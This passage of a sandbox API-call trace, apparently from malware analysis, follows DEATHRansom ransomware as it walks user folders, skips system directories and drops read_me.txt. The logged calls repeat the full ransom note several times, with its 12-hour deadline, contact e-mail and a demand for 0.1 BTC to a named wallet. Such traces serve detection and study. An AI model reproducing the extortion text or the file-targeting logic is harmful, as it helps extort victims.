cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0076.344] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8deeffb, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8deeffb, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0076.344] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0076.344] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0076.344] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0076.344] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Pictures", cAlternateFileName="")) returned 1 [0076.344] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures") returned 29 [0076.344] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0076.344] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0076.344] StrStrW (lpFirst="pictures", lpSrch="programdata") returned 0x0 [0076.344] StrStrW (lpFirst="pictures", lpSrch="$recycle.bin") returned 0x0 [0076.344] StrStrW (lpFirst="pictures", lpSrch="program files") returned 0x0 [0076.344] StrStrW (lpFirst="pictures", lpSrch="windows") returned 0x0 [0076.344] StrStrW (lpFirst="pictures", lpSrch="all users") returned 0x0 [0076.344] StrStrW (lpFirst="pictures", lpSrch="appdata") returned 0x0 [0076.344] GetProcessHeap () returned 0x4f10000 [0076.344] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bc00e8 [0076.344] lstrcpyW (in: lpString1=0x8bc00e8, lpString2="\\\\?\\C:\\Users\\Default\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures") returned="\\\\?\\C:\\Users\\Default\\Pictures" [0076.344] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 113 [0076.344] QueueUserWorkItem (Function=0x40a710, Context=0x8bc00e8, Flags=0x0) returned 1 [0076.344] GetProcessHeap () returned 0x4f10000 [0076.344] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bd00f0 [0076.345] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\*") returned 31 [0076.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.345] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\.") returned 31 [0076.345] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.345] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.346] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.346] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\..") returned 32 [0076.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.346] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.346] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0076.346] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.346] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\read_me.txt") returned 41 [0076.346] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.346] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.346] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\read_me.txt") returned 41 [0076.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\read_me.txt" (normalized: "c:\\users\\default\\pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.346] GetProcessHeap () returned 0x4f10000 [0076.346] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bd00f0 | out: hHeap=0x4f10000) returned 1 [0076.346] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0076.346] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood") returned 30 [0076.346] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0076.346] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0076.346] StrStrW (lpFirst="printhood", lpSrch="programdata") returned 0x0 [0076.346] StrStrW (lpFirst="printhood", lpSrch="$recycle.bin") returned 0x0 [0076.346] StrStrW (lpFirst="printhood", lpSrch="program files") returned 0x0 [0076.346] StrStrW (lpFirst="printhood", lpSrch="windows") returned 0x0 [0076.346] StrStrW (lpFirst="printhood", lpSrch="all users") returned 0x0 [0076.346] StrStrW (lpFirst="printhood", lpSrch="appdata") returned 0x0 [0076.346] GetProcessHeap () returned 0x4f10000 [0076.347] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bd00f0 [0076.347] lstrcpyW (in: lpString1=0x8bd00f0, lpString2="\\\\?\\C:\\Users\\Default\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood") returned="\\\\?\\C:\\Users\\Default\\PrintHood" [0076.347] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 114 [0076.347] QueueUserWorkItem (Function=0x40a710, Context=0x8bd00f0, Flags=0x0) returned 1 [0076.347] GetProcessHeap () returned 0x4f10000 [0076.347] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8be00f8 [0076.348] wnsprintfW (in: pszDest=0x8be00f8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood\\*") returned 32 [0076.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.348] wnsprintfW (in: pszDest=0x8be00f8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood\\read_me.txt") returned 42 [0076.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\read_me.txt" (normalized: "c:\\users\\default\\printhood\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0076.384] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.384] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.385] CloseHandle (hObject=0x7b4) returned 1 [0076.385] GetProcessHeap () returned 0x4f10000 [0076.385] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8be00f8 | out: hHeap=0x4f10000) returned 1 [0076.385] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Recent", cAlternateFileName="")) returned 1 [0076.385] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent") returned 27 [0076.385] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0076.385] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0076.385] StrStrW (lpFirst="recent", lpSrch="programdata") returned 0x0 [0076.385] StrStrW (lpFirst="recent", lpSrch="$recycle.bin") returned 0x0 [0076.385] StrStrW (lpFirst="recent", lpSrch="program files") returned 0x0 [0076.385] StrStrW (lpFirst="recent", lpSrch="windows") returned 0x0 [0076.385] StrStrW (lpFirst="recent", lpSrch="all users") returned 0x0 [0076.385] StrStrW (lpFirst="recent", lpSrch="appdata") returned 0x0 [0076.385] GetProcessHeap () returned 0x4f10000 [0076.385] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8be00f8 [0076.385] lstrcpyW (in: lpString1=0x8be00f8, lpString2="\\\\?\\C:\\Users\\Default\\Recent" | out: lpString1="\\\\?\\C:\\Users\\Default\\Recent") returned="\\\\?\\C:\\Users\\Default\\Recent" [0076.385] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 115 [0076.385] QueueUserWorkItem (Function=0x40a710, Context=0x8be00f8, Flags=0x0) returned 1 [0076.385] GetProcessHeap () returned 0x4f10000 [0076.385] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bf0100 [0076.386] wnsprintfW (in: pszDest=0x8bf0100, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent\\*") returned 29 [0076.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.387] wnsprintfW (in: pszDest=0x8bf0100, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent\\read_me.txt") returned 39 [0076.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\read_me.txt" (normalized: "c:\\users\\default\\recent\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0076.456] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.456] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.457] CloseHandle (hObject=0x7b8) returned 1 [0076.457] GetProcessHeap () returned 0x4f10000 [0076.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bf0100 | out: hHeap=0x4f10000) returned 1 [0076.457] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0076.458] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games") returned 32 [0076.458] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0076.458] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0076.458] StrStrW (lpFirst="saved games", lpSrch="programdata") returned 0x0 [0076.458] StrStrW (lpFirst="saved games", lpSrch="$recycle.bin") returned 0x0 [0076.458] StrStrW (lpFirst="saved games", lpSrch="program files") returned 0x0 [0076.458] StrStrW (lpFirst="saved games", lpSrch="windows") returned 0x0 [0076.458] StrStrW (lpFirst="saved games", lpSrch="all users") returned 0x0 [0076.458] StrStrW (lpFirst="saved games", lpSrch="appdata") returned 0x0 [0076.458] GetProcessHeap () returned 0x4f10000 [0076.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bf0100 [0076.458] lstrcpyW (in: lpString1=0x8bf0100, lpString2="\\\\?\\C:\\Users\\Default\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games") returned="\\\\?\\C:\\Users\\Default\\Saved Games" [0076.458] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 116 [0076.458] QueueUserWorkItem (Function=0x40a710, Context=0x8bf0100, Flags=0x0) returned 1 [0076.458] GetProcessHeap () returned 0x4f10000 [0076.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c00108 [0076.459] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\*") returned 34 [0076.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.459] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\.") returned 34 [0076.459] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.460] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.460] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.460] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\..") returned 35 [0076.460] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.460] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.460] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0076.460] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0076.460] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.460] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\read_me.txt") returned 44 [0076.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\read_me.txt" (normalized: "c:\\users\\default\\saved games\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x764 [0076.509] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 